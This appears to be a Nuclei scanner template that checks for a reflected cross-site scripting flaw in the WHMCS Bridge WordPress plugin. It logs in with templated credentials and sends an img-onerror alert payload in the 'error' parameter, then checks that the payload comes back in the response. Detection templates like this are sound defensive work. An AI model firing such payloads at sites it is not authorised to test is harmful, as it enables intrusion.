    4  - name: WHMCS Bridge < 6.4b - Reflected Cross-Site Scripting (XSS)
    5  - author: dhiyaneshDk
    6  - severity: medium
    7  - description: The plugin does not sanitise and escape the error parameter before outputting it back in admin dashboard, leading to a Reflected Cross-Site Scripting
    8  - reference:
    9  - - https://wpscan.com/vulnerability/4aae2dd9-8d51-4633-91bc-ddb53ca3471c
    10  - tags: wordpress,wp-plugin,authenticated,whmcs,xss
    11  - 
    12  -requests:
    13  - - raw:
    14  - - |
    15  - POST /wp-login.php HTTP/1.1
    16  - Host: {{Hostname}}
    17  - Origin: {{RootURL}}
    18  - Content-Type: application/x-www-form-urlencoded
    19  - Cookie: wordpress_test_cookie=WP%20Cookie%20check
    20  - 
    21  - log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
    22  - - |
    23  - GET /wp-admin/options-general.php?page=cc-ce-bridge-cp&error=%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1
    24  - Host: {{Hostname}}
    25  - 
    26  - cookie-reuse: true
    27  - matchers-condition: and
    28  - matchers:
    29  - - type: word
    30  - part: body
    31  - words:
    32  - - "<strong><img src onerror=alert(document.domain)></strong>"
    33  - condition: and
    34  - 
    35  - - type: word
    36  - part: header
    37  - words:
    38  - - text/html
    39  - 
    40  - - type: status
    41  - status:
    42  - - 200
    43  - 
Please wait...
Page is in error, reload to recover